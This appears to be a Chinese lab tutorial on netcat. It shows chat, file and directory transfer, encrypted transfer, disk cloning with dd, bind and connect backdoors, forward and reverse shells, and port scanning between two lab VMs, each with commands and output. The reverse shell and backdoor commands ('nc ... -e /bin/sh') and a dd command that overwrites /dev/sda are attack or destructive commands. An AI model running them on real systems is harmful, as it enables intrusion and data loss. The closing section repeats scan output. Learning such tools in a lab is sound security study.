一、Netcat简介
**netcat **是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。
netcat 所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。
二、Netcat常用参数:
OpenBSD netcat (Debian patchlevel 1.218-4ubuntu1)
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
[-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
[destination] [port]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-b Allow broadcast
-C Send CRLF as line-ending
-D Enable the debug socket option
-d Detach from stdin
-F Pass socket fd
-h This help text
-I length TCP receive buffer length
-i interval Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-M ttl Outgoing TTL / Hop Limit
-m minttl Minimum incoming TTL / Hop Limit
-N Shutdown the network socket after EOF on stdin
-n Suppress name/port resolutions
-O length TCP send buffer length
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s sourceaddr Local source address
-T keyword TOS value
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-V rtable Specify alternate routing table
-v Verbose
-W recvlimit Terminate after receiving a number of packets
-w timeout Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-Z DCCP mode
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
三、实验内容
实验设备:
服务端:Kali-linux-2022
192.168.3.21
客户端:Ubuntu 22.04.1 LTS
192.168.3.22
1.传输文本信息
nc 可以在两台机器之间相互传递信息,首先需要有一台机器进行监听一个端口,另一台以连接的方式去连接其指定的端口,这样两台机器之间建立了通信后,相互之间可以传输信息。l 参数是监听模式的意思,p 是指定一个端口
服务端
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234
hello?
hi?
客户端
root@ubuntu-virtual-machine:/# nc -nv 192.168.3.21 1234
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
hello?
hi?
这种相互传输信息和渗透之间的关系是,电子取证的时候可以用。当机器被攻击后,为了不破坏现场,需要提出大量的信息和文件出来做分析,这时候可以用 nc 的这个机制,例如,需要一个命令的输出信息,首先在一台机器上监听一个端口,随后在被攻击的机器上执行相关的命令,然后以管道给 nc,指定另一台的地址和端口,这样输出结果就会到另一端
2.进行文件传输
文件传输->下载
服务端在/home/kali/下创建log.txt用于记录文件
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 > /home/kali/log.txt
客户端进行nc
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 < openme.txt
回到/home/kali/目录下,查看log.txt
┌──(kali㉿kali)-[~]
└─$ cat log.txt
If you see me, the file has been successfully downloaded!
文件传输->上传
服务端传输log.txt
┌──(kali㉿kali)-[~]
└─$ nc -lp 1234 < /home/kali/log.txt
客户端接收
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 > get.txt
root@ubuntu-virtual-machine:/home/ubuntu/桌面# cat get.txt
If you see me, the file has been successfully downloaded!
可以看到已经成功写入了客户端的get.txt文件中
以windows为服务器端,kali为客户端,上述操作相反即可,这里不给出实际应用 如果此时服务端并没有准备好连接,而客户端已经使用NC进行连接, 那么客户端就会一直等待下去,知道连接上服务端,造成一种“假死"状态。 解决方法:设置等待时间
3.传输文件目录
对于传输目录其实和传输文本信息传输文件一样,当作文件处理即可,传输时将目录进行压缩进行传输,随后另一台机器接收后进行解压,这样就完成了目录的传输。例如使用 tar 命令,cvf 进行压缩,xvf 进行解压,c 是压缩的意思,v 是显示详细过程,f 是文件名,x 是解压。
服务端
┌──(kali㉿kali)-[~/Desktop]
└─$ tar cvf - ~/Desktop/ | nc -lp 1234 -q l
tar: Removing leading `/' from member names
/home/kali/Desktop/
/home/kali/Desktop/class two/
/home/kali/Desktop/heard.txt
/home/kali/Desktop/class one/
/home/kali/Desktop/class one/first.pcapng
/home/kali/Desktop/class one/class_two.pcapng
/home/kali/Desktop/class one/class_one.pcapng
客户端
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -nv 192.168.3.21 1234 | tar xvf -
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
home/kali/Desktop/
home/kali/Desktop/class two/
home/kali/Desktop/heard.txt
home/kali/Desktop/class one/
home/kali/Desktop/class one/first.pcapng
home/kali/Desktop/class one/class_two.pcapng
home/kali/Desktop/class one/class_one.pcapng
4.加密传输文件
加密传输文件需要使用 mcrypt 库,linux 系统默认是没有安装的,需要手动安装。随后和传输文件类似,只需要在传输文件时使用 mcrypt 加密即可。
命令用到的参数有,–flush 立即冲洗输出,-F 输出数据,-b 不保留算法信息,-q 关闭一些非严重的警告,-d 解密,首先在接收端监听一个端口,等待另一台进行连接传送文件,随后在要传送的机器上把要传送的文件进行加密使用 nc 连接指定的地址和 ip
服务端
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > heard.txt
Enter passphrase:
客户端
root@ubuntu-virtual-machine:/home/ubuntu/桌面# mcrypt --flush -Fbq -a rijndael-256 -m ecb < get.txt | nc -nv 192.168.3.21 1234 -q 1
Enter the passphrase (maximum of 512 characters)
Please use a combination of upper and lower case letters and numbers.
Enter passphrase: Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
Enter passphrase:
5.远程克隆硬盘
对于远程克隆硬盘,在远程电子取证时可以用,使用方法需要借助 dd 命令,首先通过 nc 监听一个端口,然后通过 dd 指定要克隆的分区,dd 的 of 参数相当于一个复制功能,然后再另一台机器通过 nc 连接此端口,dd 的 if 参数相当于粘贴的命令。格式如下:
nc -lp 6666 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.228.128 6666 -q 1
6.创建监听型/连接型后门
监听型后门
服务端
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ncat -l -e /bin/sh -p 4444
客户端
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -w 10 192.168.3.21 4444
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.21 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::8c1d:36a6:b6c7:9d64 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:fd:52:9c txqueuelen 1000 (Ethernet)
RX packets 172820 bytes 37543859 (35.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 189400 bytes 52498244 (50.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 144 bytes 7472 (7.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 144 bytes 7472 (7.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
连接型后门
服务端
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -ltvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:46990.
客户端
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
ifconfig
root@ubuntu-virtual-machine:/home/ubuntu/桌面# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.22 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::13b7:c830:cef8:924e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:71:25:8a txqueuelen 1000 (以太网)
RX packets 272375 bytes 159129764 (159.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 206658 bytes 16759835 (16.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (本地环回)
RX packets 3390 bytes 440132 (440.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3390 bytes 440132 (440.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
7.远程控制/正反shell
正向shell
正向Shell,服务器模式下的 netcat 侦听连接并将外壳进程提供给任何连接的客户端。然后以客户端模式运行的 Netcat 可以连接到服务器并获得对服务器的 shell 访问并运行命令。从渗透测试的角度来看,服务器是受害者机器,客户端是攻击者机器。
服务端
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 -c bash
客户端
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.21 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::8c1d:36a6:b6c7:9d64 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:fd:52:9c txqueuelen 1000 (Ethernet)
RX packets 172760 bytes 37538472 (35.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 189345 bytes 52492855 (50.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 74 bytes 3740 (3.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 74 bytes 3740 (3.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
反向shell
对于反向 shell,我们在服务器模式下使用 netcat 来侦听连接,然后从客户端提供 shell。这将允许服务器上的会话在收到 shell 后在客户端上运行命令。从渗透测试的角度来看,服务器是攻击者机器,客户端是受害者机器
服务端(攻击方)
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:59992.
ls
get.txt
hey.txt
home
openme.txt
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.22 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::13b7:c830:cef8:924e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:71:25:8a txqueuelen 1000 (以太网)
RX packets 272035 bytes 159047796 (159.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 206567 bytes 16752141 (16.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (本地环回)
RX packets 3388 bytes 439992 (439.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3388 bytes 439992 (439.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
客户端(受害方)
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
8.端口扫描
nc 用来进行端口扫描的命令是 nc -nvz ip 地址 端口号,z 参数翻译过来就是不进行 i/o,用来扫描。意思就是仅仅是去 ping 去探测目标是否开启指定端口,不进行任何的交互。
-n 参数翻译过来就是只接收 ip 地址,没有 dns
-v 参数就是列出执行过程的详细信息
-z 参数默认扫描的是 tcp 类型,如果需要扫描 udp,则需要使用一个新参数 -u
我先在客户机开启了apache2服务
客户机查看端口状态命令netstat -ano
┌──(root㉿kali)-[/home/kali/Desktop]
└─# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
udp 0 0 192.168.3.21:68 192.168.3.1:67 ESTABLISHED off (0.00/0/0)
raw6 0 0 :::58 :::* 7 off (0.00/0/0)
Active UNIX domain sockets (servers and established)
apache2服务默认使用的是80端口
nc -nvz 192.168.3.21 70-90
root@ubuntu-virtual-machine:/# nc -nvz 192.168.3.21 70-90
nc: connect to 192.168.3.21 port 70 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 71 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 72 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 73 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 74 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 79 (tcp) failed: Connection refused
Connection to 192.168.3.21 80 port [tcp/*] succeeded!
nc: connect to 192.168.3.21 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused
四、总结
to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused
### 四、总结
Netcat 是用于网络相关活动的非常棒的工具,我发现它在渗透测试中非常有用,实在是一款不可多得的网络测试工具。
扫一扫
260
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
